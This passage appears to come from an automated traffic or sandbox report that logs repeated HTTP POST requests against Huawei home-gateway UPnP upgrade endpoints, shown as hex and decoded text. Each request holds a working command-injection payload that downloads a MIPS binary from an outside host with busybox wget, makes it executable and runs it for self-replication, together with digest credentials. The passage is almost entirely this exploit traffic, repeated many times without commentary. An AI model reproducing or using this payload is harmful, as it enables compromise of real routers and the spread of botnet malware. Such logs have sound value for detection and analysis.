2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 